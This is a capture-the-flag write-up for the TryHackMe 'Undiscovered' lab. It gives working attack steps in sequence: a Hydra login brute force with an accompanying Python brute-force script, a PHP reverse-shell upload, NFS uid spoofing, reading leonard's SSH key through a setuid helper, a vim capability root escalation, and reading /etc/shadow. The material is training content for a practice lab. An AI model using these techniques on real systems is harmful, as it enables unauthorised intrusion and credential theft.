Undiscovered — TryHackMe — WriteUp

TonyRahmos
6 min read · Dec 1, 2020


Hello. I’m Rahmos. Here is my Undiscovered — TryHackMe — WriteUp. Check it out!

First, add undiscovered.thm to your /etc/hosts. Then deploy the machine and scan all ports with nmap:

nmap -A -T4 -p- -v <ip>

nmap

So there are 5 open ports: 22 (SSH), 80 (HTTP), 111 (RPC), 2049 (NFS), and 41693 (nlockmgr, the NFS lock manager).

Let's first visit the website on port 80:

website

I checked the page source but found nothing valuable. So let's look for hidden directories with gobuster:

gobuster dir -u http://undiscovered.thm -w /path-to-wordlist

However, gobuster found nothing.

gobuster

I also tried to list the exported NFS directories with showmount, but that did not work either (the export list is not readable from outside at this point):

showmount -e <ip>

So next, I will look for virtual hosts (subdomains) with wfuzz. The Host header is fuzzed against the same IP, `--hw 290` hides the default page (290 words) and `--hc 404,302` hides not-found and redirect responses, so only vhosts that serve something different remain:

wfuzz -c -f undiscovered.txt -w /path-to-wordlist -u "http://undiscovered.thm/" -H "Host: FUZZ.undiscovered.thm" --hw 290 --hc 404,302

I used a subdomain wordlist from SecLists.

After wfuzz finishes, cat undiscovered.txt (the `-f` output file) to see the result:

undiscovered.txt

I found many subdomains. Let's add one of them to /etc/hosts and visit it. I will start with "manager".

manager.undiscovered.thm

The site runs RiteCMS version 2.2.1. Looking for an exploit, I found this link.

What I need now is the /cms login page. However, the "manager" subdomain does not have /cms. So I wrote a simple Python script to request /cms on every subdomain found above, and "deliver" turned out to be the right one.

manager doesn’t have /cms
deliver is the right subdomain

According to the link, the default username:password is admin:admin. Let's try to log in with it.

admin : admin

However, the default credentials do not work. So I brute-forced the password with Hydra; the last field of the http-post-form string is the text the login page returns on failure, so any response without it counts as a hit:

hydra -l admin -P rockyou.txt deliver.undiscovered.thm http-post-form "/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong"

After a while, Hydra found the password.

correct password
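To make the hydra rule above explicit, here is an added example (not the original post's tooling, and not hydra's code) that applies the same failure-string oracle to the RiteCMS form. The target IP and the sample passwords are assumptions; the form field names and failure string are the ones from the hydra command.

```python
# Added example (not from the original write-up): the http-post-form check hydra performs.
import http.client
import urllib.parse

TARGET_IP = "10.10.10.10"                      # assumed: the deployed machine's IP
VHOST = "deliver.undiscovered.thm"
LOGIN_PATH = "/cms/index.php"
FAIL_STRING = "User unknown or password wrong"  # failure condition from the hydra command


def form_body(username, password):
    """URL-encode the RiteCMS login fields (hydra does the same for ^USER^/^PASS^),
    so passwords containing '&' or '=' are sent intact."""
    return urllib.parse.urlencode({"username": username, "userpw": password})


def login_succeeded(body):
    """hydra's rule for http-post-form: a hit is any response WITHOUT the failure string."""
    return FAIL_STRING not in body


def try_password(ip, vhost, username, password, timeout=5):
    """POST one credential pair to the login form and apply the oracle."""
    conn = http.client.HTTPConnection(ip, 80, timeout=timeout)
    conn.request("POST", LOGIN_PATH, body=form_body(username, password),
                 headers={"Host": vhost,
                          "Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", errors="replace")
    conn.close()
    return login_succeeded(body)


def brute_force(ip, vhost, username, wordlist_lines, attempt=None):
    """Return the first password the oracle accepts, or None.
    `attempt` lets a caller swap in a different probe (used for offline testing)."""
    if attempt is None:
        attempt = lambda pw: try_password(ip, vhost, username, pw)
    for line in wordlist_lines:
        pw = line.rstrip("\n")
        if pw and attempt(pw):
            return pw
    return None


if __name__ == "__main__":
    with open("rockyou.txt", encoding="latin-1") as fh:
        print(brute_force(TARGET_IP, VHOST, "admin", fh))
```

The caveat this makes visible: the oracle is purely "failure string absent". A rate-limit page, a 500 error or a connection that returns an empty body would also count as a success, so when hydra reports a hit it is worth confirming it with one manual login before moving on.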

Let's log in:

admin panel

Navigate to File Manager → Upload and upload php-reverse-shell.php (after setting its IP and port to match your listener).

upload shell

Now the shell has been uploaded. Start a listener on the port you put in the script:

nc -lvnp 4444

Request "deliver.undiscovered.thm/media/php-reverse-shell.php" to trigger it.

shell

I have a shell on the machine. Spawn a proper TTY with Python:

python -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm

There are 2 users in /home, but as www-data I cannot enter either home directory because of the permissions.

/home

So I need another way to get their credentials. Since there is a website, let's look in /var/www for configuration files.

/var/www

All subdomains of the website are there. Since I know "deliver" is the right one, let's look in its folder.

There are 2 hidden folders: data and files. There is nothing in files.

So let's enumerate data. However, it only contains the admin password I already found.

userdata

Let's find another way. Looking back at the nmap scan, there are NFS exports that I could not list from outside. But now that I have a shell on the machine, I can read which directories are exported with cat /etc/exports:

/etc/exports

So /home/william is exported and can be mounted. Let's check his uid and gid:

Both are 3003. NFS maps file ownership by numeric uid/gid, so create a user "william" on your own machine with the same uid and gid, then mount the export and read the directory as him.

useradd -u 3003 william

Now that "william" exists, mount his home directory (create the mount point first if useradd did not create it):

mount -t nfs <ip>:/home/william /home/william

Change william's shell to /bin/bash:

usermod --shell /bin/bash william

Then su william and enter /home/william:

/home/william

Get the 1st flag:

user.txt

Now I need a way to get root and the final flag. First, from the mounted share, change the permissions of /home/william to 777 so that www-data on the target can also read it:

chmod 777 /home/william

There are 2 interesting files in william's home directory: admin.sh and script.

admin.sh

Use ghidra to decompile script:

script

So if script is run without an argument it executes admin.sh. With an argument, the argument is appended (strcat) to a fixed path and the resulting file is read with leonard's privileges, which means any file under that path can be read as leonard.

Back in the reverse shell on the target, let's run script both ways:

without argument
with argument

Let's see if leonard has a private SSH key:

./script /.ssh/id_rsa

id_rsa

Ah yes! Now I have leonard's private SSH key. Save it to a file, chmod 600 that file and ssh to the machine as leonard with it.

ssh as leonard

And because leonard's private key has no passphrase, I'm in!

Let's check file capabilities:

getcap -r / 2>/dev/null

getcap

So vim.basic has cap_setuid, which lets it change its uid to 0. Following GTFOBins, run this to get a root shell:

gtfobins

/usr/bin/vim.basic -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

That does not work: `:py` uses vim's Python 2 interface, and this vim only has Python 3 support. Try again with `:py3`:

/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

root shell

Now I'm root! Get root's password hash from /etc/shadow; it is the final flag.

root's password hash

The end.

HAPPY HACKING